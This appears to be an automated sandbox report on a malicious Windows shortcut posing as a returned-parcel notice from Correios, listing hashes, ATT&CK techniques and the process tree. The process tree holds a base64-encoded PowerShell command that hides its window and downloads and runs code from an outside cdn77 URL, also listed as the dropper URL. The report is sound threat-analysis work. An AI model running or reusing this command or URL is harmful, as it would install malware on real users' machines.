858c09f6032b213e8cb62f48d6ecb7237637e9eea5866973905d6c1f13a81bdf

Analysis

max time kernel
93s
max time network
94s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
13-09-2024 19:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Mercadoria_Devolvida-Correios-2CM0TJ01.lnk
Size

3KB
MD5

246e74b6fffb9d5994f7f70bb6509b45
SHA1

4b7bdf4808ce987b9f94ea40bdd081217867483a
SHA256

0db8cc27123c8bbd5ae0139980b604c514caeeed51da22d67d440e5369f8be1e
SHA512

178cf1ff0d8213ff94de68f5c1c267d50c3a958126925a2c50a554a29229c6f6834d1bf140fdb9f7168352d068880c7730e047e177496af0a8b57dde62fd8e08

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://1361227624.rsc.cdn77.org/v2/gl.php?aHR0cHM6Ly8xMzYxMjI3NjI0LnJzYy5jZG43Ny5vcmcvdjJ8d3IzMQ%3D%3D%

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
4	2972	powershell.exe
6	2972	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
2972	powershell.exe
2972	powershell.exe
2972	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2972	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 3712 wrote to memory of 2972	3712	cmd.exe	84
PID 3712 wrote to memory of 2972	3712	cmd.exe	84
PID 2972 wrote to memory of 3500	2972	powershell.exe	85
PID 2972 wrote to memory of 3500	2972	powershell.exe	85
PID 3500 wrote to memory of 3128	3500	csc.exe	87
PID 3500 wrote to memory of 3128	3500	csc.exe	87

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\Mercadoria_Devolvida-Correios-2CM0TJ01.lnk
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3712
- C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe" -en YQBEAGQALQB0AFkAUABFACAALQBOAGEATQBFACAAQQAgAC0ATQBFAE0AYgBlAFIAZABlAGYAaQBOAEkAVABpAG8AbgAgACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQAgAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGIAbwBvAGwAIABTAGgAbwB3AFcAaQBuAGQAbwB3ACgAaQBuAHQAIABoACwAIABpAG4AdAAgAHMAKQA7ACcAIAAtAE4AYQBtAGUAUwBQAEEAQwBFACAAQgA7AFsAQgAuAGEAXQA6ADoAUwBIAE8AdwBXAGkAbgBkAE8AVwAoACgAWwBzAFkAUwB0AGUAbQAuAGQAaQBhAEcATgBvAHMAdABpAEMAcwAuAFAAcgBvAEMAZQBzAFMAXQA6ADoARwBFAFQAYwB1AFIAcgBlAG4AVABwAFIAbwBDAGUAcwBzACgAKQAgAHwAIABQAFMAKQAuAG0AYQBJAG4AVwBJAE4ARABvAHcASABBAG4AZABsAGUALAAwACkAOwBJAEUAeAAoAE4ARQB3AC0AbwBCAGoAZQBDAHQAIABOAEUAVAAuAHcARQBCAGMAbABJAEUAbgBUACkALgBEAG8AVwBOAGwATwBhAEQAcwB0AFIASQBOAEcAKAAnAGgAdAB0AHAAcwA6AC8ALwAxADMANgAxADIAMgA3ADYAMgA0AC4AcgBzAGMALgBjAGQAbgA3ADcALgBvAHIAZwAvAHYAMgAvAGcAbAAuAHAAaABwAD8AYQBIAFIAMABjAEgATQA2AEwAeQA4AHgATQB6AFkAeABNAGoASQAzAE4AagBJADAATABuAEoAegBZAHkANQBqAFoARwA0ADMATgB5ADUAdgBjAG0AYwB2AGQAagBKADgAZAAzAEkAegBNAFEAJQAzAEQAJQAzAEQAJQAnACkA
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2972
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zgjijgp4\zgjijgp4.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3500
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9E92.tmp" "c:\Users\Admin\AppData\Local\Temp\zgjijgp4\CSCC31D16DAAA7432E8A51821572784C.TMP"
      4⤵
      PID:3128

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES9E92.tmp

Filesize
1KB

MD5
8ac2ddf27a57e928b50c3c7d8e642257

SHA1
e812dcc321b9f63c12ce022b556190550c287c84

SHA256
84dddd374ec1579a984ab46898c697fa898e9f6f27b0af15e76fc0830eeea86c

SHA512
190b71c23e5dec843e60b0e8ee33cab08895678062b2ca6800a24aac6a7d3bfa0f2bd5c443cd8354f60b13f7cb85fc1829ef132f34a5d4b4898aff4ba1fc6985

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fsmxwpuf.mck.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\zgjijgp4\zgjijgp4.dll

Filesize
3KB

MD5
30bc7e6db92e23a64dba1f75299b0c3f

SHA1
6256f6350f441c4a14ee7896bb5172b34cebe639

SHA256
c5b89b230f9e0e756c3b9c4865c66fecc64e3269f8cada2dde4ff39eddaf2aae

SHA512
2f73e186442bd2e5c239523f968f2410b902a6154ebb50edd2aea24cd5773b594ff581c2ce683dedafd1ba326d7988227eb78c03a61937900e3dc046c2a6193b

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\zgjijgp4\CSCC31D16DAAA7432E8A51821572784C.TMP

Filesize
652B

MD5
ef61dd7dd76a1773f7fa983fcd7d42cd

SHA1
c3229b237696f551385a91f7e6d450012afe7930

SHA256
40114996e3fa0b248a6002398d2e54ec27ea17504c4a9383abaa1c0d3ab39949

SHA512
fa05b128b7bb671ce7e48c46328e44bb9efd1f68d0260cb6d5a5dc157fb1cc9ad62070d5674f57be972e72924d193e81f76b8e04367185e49005e0e74e1dff17

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\zgjijgp4\zgjijgp4.0.cs

Filesize
187B

MD5
7b0e7177dfbb9edd1c1ef08b4fdfae2f

SHA1
cb11a0252cdad66ec247312ccb7feb46456e52b6

SHA256
6caf22ef995616dc37bec21b2af3aa4597cdad88e00a13de0122db3af4e9a4aa

SHA512
7322be891145e550405917757420aeb513e5689970d34647177b1a79a12c7776d4e49c129b093be9927b46bc7582c0379e0cb520af58d4410ed4c5ef98b4dbfd

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\zgjijgp4\zgjijgp4.cmdline

Filesize
369B

MD5
953db8ee5b3d6eb6a769bca0fccc6632

SHA1
f30ced906d2802fdf05357ee93e48ac38bbb4775

SHA256
9a80a9bc63f23d2587856fddd6e7d69fafd6d7c595ccbb8a67c0c18a41f47357

SHA512
2c3901bde299c5088105f211ef12208172868211d73ff6837c2ad694402225b10129bfde2a89e93e0cfb823d769371be0bfa596727532ad7854a41d7a442b153

Download Submit
memory/2972-2-0x00007FFDC3A43000-0x00007FFDC3A45000-memory.dmp

Filesize
8KB

Download
memory/2972-12-0x0000020977F00000-0x0000020977F22000-memory.dmp

Filesize
136KB

Download
memory/2972-13-0x00007FFDC3A40000-0x00007FFDC4501000-memory.dmp

Filesize
10.8MB

Download
memory/2972-14-0x00007FFDC3A40000-0x00007FFDC4501000-memory.dmp

Filesize
10.8MB

Download
memory/2972-27-0x0000020977EE0000-0x0000020977EE8000-memory.dmp

Filesize
32KB

Download
memory/2972-31-0x00007FFDC3A40000-0x00007FFDC4501000-memory.dmp

Filesize
10.8MB

Download